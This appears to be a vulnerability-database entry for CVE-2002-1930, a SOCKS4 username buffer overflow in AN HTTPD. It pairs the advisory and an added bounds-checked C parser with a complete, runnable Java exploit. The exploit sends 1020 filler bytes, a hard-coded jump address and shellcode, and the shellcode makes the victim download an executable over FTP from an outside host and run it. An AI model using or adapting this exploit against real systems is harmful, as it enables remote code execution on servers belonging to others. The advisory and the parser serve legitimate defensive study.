AN HTTPD Malformed SOCKS4 Request Remote Buffer Overflow Vulnerability


Vulnerability ID: 1107052    Vulnerability type: Boundary condition error
Published: 2002-10-21    Updated: 2005-10-20
CVE ID: CVE-2002-1930
CNNVD ID: CNNVD-200212-109
Platform: Windows    CVSS score: 7.5
|Vulnerability Source
https://www.exploit-db.com/exploits/21955
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200212-109
|Vulnerability Details
AN HTTPD is a Japanese multi-user server program that can also operate as a SOCKS4 server. When running as a SOCKS4 server it handles the username carried in a SOCKS4 request unsafely: the USERID field is not bounds-checked, so a remote attacker can supply an overly long username in a SOCKS4 request and cause a buffer overflow in AN HTTPD. With carefully constructed request data this can be used to execute arbitrary instructions on the system with the privileges of the AN HTTPD process.
|Vulnerability Exploit
source: http://www.securityfocus.com/bid/6012/info

A buffer overflow vulnerability has been reported for AN HTTPD. The vulnerability is due to insufficient bounds checking of usernames for SOCKS4 requests.

When AN HTTPD acts as a SOCKS4 server, it handles user names in an unsafe manner. An attacker can exploit this vulnerability by sending an overly long username as part of a SOCKS4 request. This may overflow a buffer used by AN HTTPD and cause the server to overwrite adjacent memory. Successful exploitation may, in turn, lead to the execution of arbitrary code as the AN HTTPD process.
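The flaw described above is a missing bound on the NUL-terminated USERID field that follows the fixed 8-byte SOCKS4 header (VN, CD, DSTPORT, DSTIP). The following C program is an added example, not code from the page, from AN HTTPD or from the exploit author: it is a bounds-checked SOCKS4 request parser that scans the USERID field only up to an assumed cap (SOCKS4_MAX_USERID, 255 bytes, a policy value chosen for this example) and copies it with its measured length, so a long username is rejected instead of overrunning the destination buffer. It distinguishes a request that is merely incomplete (no terminator yet, but still under the cap, so the server should read more) from one whose username is too long (the overflow case, which should be rejected and logged). The sample inputs are constructed in the code and reuse the same CONNECT header layout the published exploit sends (dst 0.0.0.1:1), followed by runs of filler bytes.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>
#include <stdio.h>

/* Assumed policy for this example: the longest USERID we accept (not a value from the page). */
#define SOCKS4_MAX_USERID 255
#define SOCKS4_HDR_LEN    8      /* VN(1) CD(1) DSTPORT(2) DSTIP(4) */

enum socks4_status {
    SOCKS4_OK = 0,
    SOCKS4_ERR_SHORT,        /* fewer than 8 header bytes available */
    SOCKS4_ERR_VERSION,      /* VN is not 4 */
    SOCKS4_ERR_COMMAND,      /* CD is neither CONNECT(1) nor BIND(2) */
    SOCKS4_ERR_INCOMPLETE,   /* USERID not yet terminated but still within the cap: read more */
    SOCKS4_ERR_USERID_LONG   /* no NUL within SOCKS4_MAX_USERID bytes: reject and log */
};

struct socks4_request {
    uint8_t  command;
    uint16_t dst_port;                       /* host byte order */
    uint32_t dst_ip;                         /* host byte order */
    char     userid[SOCKS4_MAX_USERID + 1];  /* always NUL-terminated on SOCKS4_OK */
    size_t   userid_len;
};

/* Parses one SOCKS4 request from buf[0..len). The USERID field is scanned for at most
 * SOCKS4_MAX_USERID + 1 bytes and copied with its measured length, so attacker-controlled
 * input can never write past out->userid. */
int socks4_parse(const uint8_t *buf, size_t len, struct socks4_request *out)
{
    if (len < SOCKS4_HDR_LEN)        return SOCKS4_ERR_SHORT;
    if (buf[0] != 4)                 return SOCKS4_ERR_VERSION;
    if (buf[1] != 1 && buf[1] != 2)  return SOCKS4_ERR_COMMAND;

    const uint8_t *uid   = buf + SOCKS4_HDR_LEN;
    size_t         avail = len - SOCKS4_HDR_LEN;
    /* Never look further than one byte past the cap: that byte must be the NUL. */
    size_t         scan  = avail < SOCKS4_MAX_USERID + 1 ? avail : SOCKS4_MAX_USERID + 1;
    const uint8_t *nul   = memchr(uid, 0, scan);

    if (nul == NULL)
        return avail > SOCKS4_MAX_USERID ? SOCKS4_ERR_USERID_LONG : SOCKS4_ERR_INCOMPLETE;

    out->command    = buf[1];
    out->dst_port   = (uint16_t)((buf[2] << 8) | buf[3]);
    out->dst_ip     = ((uint32_t)buf[4] << 24) | ((uint32_t)buf[5] << 16) |
                      ((uint32_t)buf[6] << 8)  |  (uint32_t)buf[7];
    out->userid_len = (size_t)(nul - uid);
    memcpy(out->userid, uid, out->userid_len);
    out->userid[out->userid_len] = '\0';
    return SOCKS4_OK;
}

/* Constructed test input: the 8-byte CONNECT header for dst 0.0.0.1:1 followed by `n` copies
 * of `fill` as USERID, NUL-terminated if `terminate`. Returns the parser's verdict so the
 * boundary cases can be probed without a network; `req` may be NULL. */
int socks4_check_fill(uint8_t fill, size_t n, int terminate, struct socks4_request *req)
{
    static uint8_t buf[4096];
    struct socks4_request tmp;
    if (req == NULL) req = &tmp;
    if (n > sizeof buf - SOCKS4_HDR_LEN - 1) return -1;   /* sample too big for the scratch buffer */

    const uint8_t hdr[SOCKS4_HDR_LEN] = {0x04, 0x01, 0x00, 0x01, 0x00, 0x00, 0x00, 0x01};
    memcpy(buf, hdr, SOCKS4_HDR_LEN);
    memset(buf + SOCKS4_HDR_LEN, fill, n);
    size_t len = SOCKS4_HDR_LEN + n;
    if (terminate) buf[len++] = 0x00;
    return socks4_parse(buf, len, req);
}

int main(void)
{
    struct socks4_request req;
    printf("5-byte userid          -> %d\n", socks4_check_fill('a', 5, 1, &req));
    printf("userid exactly at cap  -> %d\n", socks4_check_fill('a', SOCKS4_MAX_USERID, 1, &req));
    printf("1020 filler bytes      -> %d\n", socks4_check_fill('A', 1020, 1, &req));
    printf("partial read, no NUL   -> %d\n", socks4_check_fill('a', 3, 0, &req));
    return 0;
}
```

A server built on this parser would answer SOCKS4_ERR_USERID_LONG with a rejection reply and a log entry carrying the peer address and the observed USERID length; a spike of such entries is the simplest detection signal for this class of request. The INCOMPLETE verdict matters because a legitimate client may deliver the username across several TCP segments, and treating that as an error would break normal traffic.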

/*///////////////////////////////////////////////////////////////////////////

 AN HTTPD Version 1.41c SOCKS4 username buffer overflow exploit
  for Japanese Windows 2000 Pro (SP2)

 written by Kanatoko <[email protected]>
 http://www.jumperz.net/

///////////////////////////////////////////////////////////////////////////*/

import java.net.*;
import java.io.*;

public class anhttpd141c_exploit
{
    private static final int SOCKS_PORT = 1080;

    private String targetHost;
    //----------------------------------------------------------------------------
    public static void main( String[] args )
    throws Exception
    {
        if( args.length != 1 )
        {
            System.out.println( "Usage: java anhttpd141c_exploit TARGETHOST( or IP )" );
            return;
        }
        anhttpd141c_exploit instance = new anhttpd141c_exploit( args[ 0 ] );
        instance.doIt();
    }
    //----------------------------------------------------------------------------
    public anhttpd141c_exploit( String IN_targetHost )
    throws Exception
    {
        targetHost = IN_targetHost;
    }
    //----------------------------------------------------------------------------
    private void doIt()
    throws Exception
    {
        Socket socket = new Socket( targetHost, SOCKS_PORT );
        OutputStream os = socket.getOutputStream();

        // SOCKS4 header: VN=4, CD=1 (CONNECT), DSTPORT=1, DSTIP=0.0.0.1; USERID follows
        byte[] socks4_request = {
            (byte)0x04, (byte)0x01, (byte)0x00, (byte)0x01, (byte)0x00, (byte)0x00, (byte)0x00, (byte)0x01
        };

        // egg: download and start installing Netscape4.79 :)
        // http://www.jumperz.net/egg_netscape.cpp
        byte[] egg = {
            (byte)0x55, (byte)0x8B, (byte)0xEC, (byte)0x53, (byte)0xEB, (byte)0x57, (byte)0x90, (byte)0x90,
            (byte)0x90, (byte)0x5B, (byte)0x33, (byte)0xC0, (byte)0x88, (byte)0x63, (byte)0x01, (byte)0x88,
            (byte)0x63, (byte)0x03, (byte)0x83, (byte)0xC3, (byte)0x68, (byte)0x88, (byte)0x23, (byte)0x88,
            (byte)0x63, (byte)0x21, (byte)0x88, (byte)0x63, (byte)0x2E, (byte)0x83, (byte)0xEB, (byte)0x68,
            (byte)0x53, (byte)0x83, (byte)0xC3, (byte)0x02, (byte)0x53, (byte)0xB9, (byte)0xC2, (byte)0x1B,
            (byte)0x02, (byte)0x78, (byte)0xFF, (byte)0xD1, (byte)0x50, (byte)0x83, (byte)0xC3, (byte)0x02,
            (byte)0x53, (byte)0xB9, (byte)0x8B, (byte)0x38, (byte)0x02, (byte)0x78, (byte)0xFF, (byte)0xD1,
            (byte)0x59, (byte)0xB9, (byte)0xB8, (byte)0x0E, (byte)0x01, (byte)0x78, (byte)0xFF, (byte)0xD1,
            (byte)0x83, (byte)0xC3, (byte)0x65, (byte)0x53, (byte)0xB9, (byte)0x4A, (byte)0x9B, (byte)0x01,
            (byte)0x78, (byte)0xFF, (byte)0xD1, (byte)0x83, (byte)0xC3, (byte)0x21, (byte)0x53, (byte)0xB9,
            (byte)0x4A, (byte)0x9B, (byte)0x01, (byte)0x78, (byte)0xFF, (byte)0xD1, (byte)0xB8, (byte)0x94,
            (byte)0x8F, (byte)0xE6, (byte)0x77, (byte)0xFF, (byte)0xD0, (byte)0xE8, (byte)0xA7, (byte)0xFF,
            (byte)0xFF, (byte)0xFF, (byte)0x77, (byte)0x58, (byte)0x71, (byte)0x58, (byte)0x62, (byte)0x69,
            (byte)0x6E, (byte)0x61, (byte)0x72, (byte)0x79, (byte)0x0A, (byte)0x67, (byte)0x65, (byte)0x74,
            (byte)0x20, (byte)0x2F, (byte)0x70, (byte)0x75, (byte)0x62, (byte)0x2F, (byte)0x63, (byte)0x6F,
            (byte)0x6D, (byte)0x6D, (byte)0x75, (byte)0x6E, (byte)0x69, (byte)0x63, (byte)0x61, (byte)0x74,
            (byte)0x6F, (byte)0x72, (byte)0x2F, (byte)0x65, (byte)0x6E, (byte)0x67, (byte)0x6C, (byte)0x69,
            (byte)0x73, (byte)0x68, (byte)0x2F, (byte)0x34, (byte)0x2E, (byte)0x37, (byte)0x39, (byte)0x2F,
            (byte)0x77, (byte)0x69, (byte)0x6E, (byte)0x64, (byte)0x6F, (byte)0x77, (byte)0x73, (byte)0x2F,
            (byte)0x77, (byte)0x69, (byte)0x6E, (byte)0x64, (byte)0x6F, (byte)0x77, (byte)0x73, (byte)0x39,
            (byte)0x35, (byte)0x5F, (byte)0x6F, (byte)0x72, (byte)0x5F, (byte)0x6E, (byte)0x74, (byte)0x2F,
            (byte)0x63, (byte)0x6F, (byte)0x6D, (byte)0x70, (byte)0x6C, (byte)0x65, (byte)0x74, (byte)0x65,
            (byte)0x5F, (byte)0x69, (byte)0x6E, (byte)0x73, (byte)0x74, (byte)0x61, (byte)0x6C, (byte)0x6C,
            (byte)0x2F, (byte)0x63, (byte)0x63, (byte)0x33, (byte)0x32, (byte)0x64, (byte)0x34, (byte)0x37,
            (byte)0x39, (byte)0x2E, (byte)0x65, (byte)0x78, (byte)0x65, (byte)0x0A, (byte)0x71, (byte)0x75,
            (byte)0x69, (byte)0x74, (byte)0x58, (byte)0x66, (byte)0x74, (byte)0x70, (byte)0x2E, (byte)0x65,
            (byte)0x78, (byte)0x65, (byte)0x20, (byte)0x2D, (byte)0x73, (byte)0x3A, (byte)0x71, (byte)0x20,
            (byte)0x2D, (byte)0x41, (byte)0x20, (byte)0x66, (byte)0x74, (byte)0x70, (byte)0x2E, (byte)0x6E,
            (byte)0x65, (byte)0x74, (byte)0x73, (byte)0x63, (byte)0x61, (byte)0x70, (byte)0x65, (byte)0x2E,
            (byte)0x63, (byte)0x6F, (byte)0x6D, (byte)0x58, (byte)0x63, (byte)0x63, (byte)0x33, (byte)0x32,
            (byte)0x64, (byte)0x34, (byte)0x37, (byte)0x39, (byte)0x2E, (byte)0x65, (byte)0x78, (byte)0x65,
            (byte)0x58
        };

        byte[] jmp_esp = {
            (byte)0x02, (byte)0x4E, (byte)0x02, (byte)0x78
        };

        os.write( socks4_request );

        //where is memset? :0
        for( int i = 0; i < 1020; ++i )
        {
            os.write( (byte)0x41 );
        }

        os.write( jmp_esp );
        os.write( egg );
        os.write( (byte)0x00 );   // NUL terminates the USERID field
        os.flush();
        socket.close();
    }
    //----------------------------------------------------------------------------
}
|References

Source: BID
Name: 6012
Link: http://www.securityfocus.com/bid/6012
Source: XF
Name: an-http-socks4-bo(10410)
Link: http://www.iss.net/security_center/static/10410.php
Source: VULNWATCH
Name: 20021021 AN HTTPD SOCKS4 username Buffer Overflow Vulnerability
Link: http://archives.neohapsis.com/archives/vulnwatch/2002-q4/0032.html
Source: NSFOCUS
Name: 3711
Link: http://www.nsfocus.net/vulndb/3711
